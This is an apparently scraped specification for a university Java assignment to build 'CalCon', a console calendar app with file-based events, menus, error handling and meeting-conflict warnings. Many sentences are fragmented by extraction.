you choose are meaningful to improve the readability of your code.Ensure to add meaningful comments in between your code and Javadoc comments for classes and methods.We will provide a marking scheme to help guide you in the development of your program. Also we will guide you how to model your program. But using correct syntaxes and conventions can be learnt here. Calendar Console have changed. Here is some information about the data Calendar Console can process.A calendar can have multiple calendar entries. Each calendar entry has a calendar date and can have zero or more events. A calendar is initialised witha start date. The calendar can be viewed in three modes –weeks.Each event in a calendar entry has a description. Events can either beTimed Events also have start and end times in the format HH: mm.days.Assumption: Though Sat/Sun are non-working days but are not tested in this AssignmentA timed event on a non-working day has a special criterion. If someone tries to set up a meeting that conflicts with an existing scheduled meeting or a meeting is set up on a non-working day, the program will send an email to reschedule the event.Pro Tip: Sending an email here simply uses print statements. No overly complicated coding required for the assignment. Your program will have three command-line inputs. These are – • Date in the format yyyy-MM-dd to initialise the calendar’s start datebe MONTHLY, FORTNIGHTLY, or WEEKLY.$java CalCon 2025-05-26 MONTHLY assets/events1.txtError ScenariosWorst Case Scenario: Your program may behave incorrectly if the params are not handled explicitly. These inputs will be tested with varied data. The data files name may change but will always be String.The program can face below error scenarios and must handle them byprinting the error messages accordingly and terminating the program.Exiting Program.Print Invalid Date. Exiting Program.Program.If valid command line arguments are present, initialise the calendar.Once the calendar is initialised, it is important to read some data from the files and load them into the appropriate objects of classes. The files are present in assets folder.Assumption: While handling the files in code, you can assume the folder name assets remain unchanged.File Data DescriptionThe file has data in a comma-separated format. Where data is missing, the comma will still be present. The file has a header that describes the datapresent in it. The order of the data will always remain the same.be considered Invalid.considered Invalid.represents the start time of the event. Otherwise empty.represents the end time of the event. Otherwise empty.Note that the file names may change. The folder names won’t change. You must not hardcode the file names in the code.command line arguments.must ignore this while reading the data.the data by comma and processing individual data points.invalid data or an invalid line format. In this case, skip the line and proceed to read the next line. The program must not be terminated.See the next section for Exception handling.Note: Remember in java the file extensions doesn’t matter as long as the content is text in nature. So you may or may not have any file extensions like .txtThe program must write the changes made to the events during the program execution back to the events file using the filename provided to the program in the command line argument. The data is read from the calendar. For those dates where one or more events are present, the program will write the data back to the file. The order of the events is maintained by the order of insertion in the events array.While writing the data back, the header must be reserved as is. The program must update the events file only once at the end of the program when the user has quit from the main menu (See Option 4 in Main Menu slides) Several exceptions may happen in the program.Worst Case Scenario: Your program may behave incorrectly if not handled explicitly. These kind of inputs will be tested.Unable to process file. Exiting program.Invalid Event Line. Skipping this line.to the next line.Note that if one line has more than one error, only first error encountered is printed and the program moves on to the next line.The order of processing the datapoints and respective errors is as follows –Skipping this line.event type. Skipping this line. or Invalid Timed event type. Skipping this line.empty. Skipping this line. or End Time cannot be empty. Skipping this line.Incorrect Start Time format. Skipping this line. or Incorrect End Time format. Skipping this line.Assumption: Since we are reading a comma separated file, none of the string data like description will have a comma as a data. Comma is only used to represent data delimiter and not data itself.If the date in the events file is correct but is outside the calendar view, printDate is outside calendar view. Skipping this line.Worst Case Scenario: Remember that the method that throws the exception does not catch and handle it. See the marking scheme.There are no exceptions thrown during Program Execution, but they are handled using logic. See the next few slides on program execution for details. Modifications: This section is referred from Assignment 1 with slight modifications.Once the calendar is initialised, the program will show the Calendar initialised with dates and the cursor ‘x’ on the first date. Remember, the calendar view will differ based on the calendar view type. The MONTHLY view is the same as Assignment 1. Here are the other views shown –FORTNIGHTLY———————————— | M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || x | | | | | | || | | | | 2 | | |————————————| 09 | 10 | 11 | 12 | 13 | 14 | 15 || | | | | | | || | | | | | | |———————————— WEEKLY———————————— | M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || | | | | x | | || 2 | | 1 | | 2 | | |————————————The next thing to show is the main menu for the user to select and perform some operations.Modifications: This section is referred from Assignment 1 with slight modifications.———————————— | M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || x | | | | | | || 2 | | 1 | | 2 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.>To add/edit/delete the event(s) in the calendar, the user must select a date first. The first date is selected by default. To select any other date, the usersimply inputs a date when prompted.Note, the date can be in an invalid format or outside the calendar view. In such cases, the program must print an error message and ask the user to input the date again. See sample output below –———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || x | | | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 1Enter a date in yyyy-MM-dd format : 2025-06-02Date is outside calendar view.Enter a date in yyyy-MM-dd format : 2025-06 Incorrect date format.Enter a date in yyyy-MM-dd format : 202-09-01 Invalid date.Enter a date in yyyy-MM-dd format : 2025-05-27Date selected successfully———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || | x | | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.>Note: The text in bold represents user input here. You don’t need to make the console inputs bold in your code.Carried Forward: This section is referred as is from Assignment 1Once the user has selected a date, they can now add/edit/view/delete an event marked on the calendar for the selected date. The program should print a submenu –———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || | | x | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 2Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event. Press Q to exit.Submenu handling is discussed here.Option 3: Printing all events.Modifications: This section is referred from Assignment 1 with slight modifications.If the user wants to see all the events marked in the calendar, the program must present them in a tabular form. The program must show only the events present in the calendar view and not all the events read from the file.———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || | | x | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 3—————————————————————————-——————————————————————–ID Date Event Type Event SubType Start Time End Time Description—————————————————————————-——————————————————————–On Vacation – Canada Some random event On Vacation – Canada On Vacation – Canada —————————————————————————-——————————————————————–Tip: Use the formatter %2s%12s%12s%20s%12s%12s%40s%n to print the header and the events.However, if the calendar has no events, the program should show an error message.———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || | | x | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 3No events present in the calendar.———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || | | x | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar. Press 4 to exit.Carried Forward: This section is referred as is from Assignment 1In case the user selects option 4, the program must gracefully quit the program and print a goodbye message.Look at the complete output below.———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || x | | | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 4Exiting CalCon Now.Warning: Do not use System.exit() as it is not a graceful exit. Penalty will be applied.Carried Forward: This section is referred as is from Assignment 1In case the user provides an invalid input, like 8 or 9, the program should be able to print “Invalid Input” and show the main menu. Sample output———————————— | M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || x | | | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.> 6Invalid input.————————————| M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 30 | 31 | 01 || x | | | | | | || | | 2 | 1 | 1 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.>Out of Scope: The program only expects an integer value for the main menu. You do not need to handle string or double values as input at this point of time for the main menu. Once the submenu is printed, the user can take multiple actions.Modifications: This section is referred from Assignment 1 with slight modificationsTo add an event, the program must take certain data inputs from the user. Once taken, it should add the event to that date. Note that there could be more than one event added to a date. Once an event is added and the user returns to the main menu, the calendar should also show the updated count for the number of events present on a date. See the output below –Adding a Timed EventPress V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ATo add an event, enter the following detailsEvent Type (ALL_DAY, TIMED) : TIMEDEvent SubType (REMINDER, MEETING) : MEETINGStart Time (HHmm) : 10:30End Time (HHmm) : 11:30Description : Some random meetingEvent added successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Adding an All Day EventPress V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ATo add an event, enter the following detailsEvent Type (ALL_DAY, TIMED) : ALL_DAYEvent SubType (BIRTHDAY, ANNIVERSARY, OUT_OF_OFFICE, PUBLIC_HOLIDAY) : OUT_OF_OFFICEDescription : Sick Leave Event added successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Assumption: All inputs are valid. Invalid inputs not tested in add/edit events.Modifications: This section is referred from Assignment 1 with slight modificationsTo edit an event, the user should select the event number to edit from. Thus, we will show all the events on the selected date and let the user choose from the events to edit. See Option V to understand how to show the list of events for Timed vs All-day events. Once the event number is selected, the program should prompt the user to input details similar to the add event scenario. See the output below – Editing a Timed EventPress V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ETo edit an event, select an event number from below –Following event(s) found for the day –To edit this event, enter the following details Event Type (ALL_DAY, TIMED) : TIMEDEvent SubType (REMINDER, MEETING) : REMINDERStart Time (HHmm) : 16:00End Time (HHmm) : 16:15 Description : Call Tax officeEvent updated successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Editing an All Day EventPress V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ETo edit an event, select an event number from below –Following event(s) found for the day –> 1To edit this event, enter the following detailsEvent Type (ALL_DAY, TIMED) : ALL_DAYEvent SubType (BIRTHDAY, ANNIVERSARY, OUT_OF_OFFICE, PUBLIC_HOLIDAY) : OUT_OF_OFFICEDescription : Sick Leave updatedEvent updated successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Carried Forward: This section is referred as is from Assignment 1Deleting an event is similar to editing an event. The user must choose the event number from the list of events present on the day to delete. See the output below –Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> DTo delete an event, select an event number from below –Following event(s) found for the day –> 2Event deleted successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>If the user selects option V after this, the deleted event should not be presentin the list.Modifications: This section is referred from Assignment 1 with slight modificationsViewing a day’s events will simply list all the events present on the selectedday, but in a concise manner.the description.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> VFollowing event(s) found for the day – 1. OUT_OF_OFFICE Event : On Vacation – CanadaTip: Use the formatter “%d. %s Event : %s – %s : %s%n” to print a Timed event for the day and “%d. %s Event : %s%n” to print a All Day event.Carried Forward: This section is referred as is from Assignment 1If the user selects Q, the program must quit the submenu, print the calendar view and go back to the main menu.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> Q———————————— | M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || x | | | | | | || 2 | | 1 | | 2 | | |————————————Select an option to proceed.Press 1 to select a date.Press 2 to enter current selection’s sub menu.Press 3 to view all events in a calendar.Press 4 to exit.>Carried Forward: This section is referred as is from Assignment 1Note that the submenu receives an input string for A/E/D/V/Q. Thus, any input which is a string but is not a valid option should be handled accordingly, with an error message printed.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> KInvalid input.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Case 1: No events present for the day.Carried Forward: This section is referred as is from Assignment 1In case of editing/deleting/viewing, if there are no events present for the day, show the error message and print the submenu.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> VThere are no events marked in the calendar for the day.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Addition: This specification is entirely new to Assignment 2.While adding or editing a meeting event, if the calendar date is marked with Out of Office or Public Holiday, the program should allow adding a meeting, but it should create a method sendEmail() that prints a warning I am not available today. Please reschedule the event.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ATo add an event, enter the following details Event Type (ALL_DAY, TIMED) : TIMEDEvent SubType (REMINDER, MEETING) : MEETINGStart Time (HHmm) : 10:30End Time (HHmm) : 11:30Description : Some random meetingEvent added successfully.I am not available today. Please reschedule the event.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Assumption: Adding other kind of events to a Non Working day is not tested.Addition: This specification is entirely new to Assignment 2.While adding/editing the meeting has a time overlap with other meetings i.e.before the end time of the other meetingbut before the end time of the other meetingmeeting, but has an end time after the start time of the other meeting. In this case, the program should send an email(create a method sendEmail() that prints the error message There is a conflict for this event, Reschedule the event.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> VFollowing event(s) found for the day – 1. REMINDER Event : 14:00 – 14:15 : Take medicine 2. MEETING Event : 10:30 – 11:30 : Team sync-upPress V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ATo add an event, enter the following details Event Type (ALL_DAY, TIMED) : TIMEDEvent SubType (REMINDER, MEETING) : REMINDERStart Time (HHmm) : 10:45End Time (HHmm) : 11:00 Description : Call mom.Event added successfully.There is a conflict for this event, Reschedule the event.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> create other classes as well.classes. Create the data fields as instance variables in those classes.of time.you are using the Integer.parseInt.exceptions as well.at least one inheritance hierarchy.and implement at least one interface.reading and writing.this method to perform a split on comma.Your code should be annotated using javadoc comments. We will generate the javadoc for your code. You do not need to submit it. You can run javadoc on your machine (up to any levels of nested packages) by running thecommand$ javadoc -d docs/ **/*.javaThe UML Diagram is discussed in the Week 9 Lecture in detail. The UML Diagram present in the code challenge is just a starter code, which can act as a scaffold or guide you what are mandatory classes/methods in theassignment.You must create packages and add the classes to some packages.methods present there., and the italicised method is an abstract method. You arefree to change the definition of the abstract method by adding parameters if you see that is fit, but the Event class must be abstract.
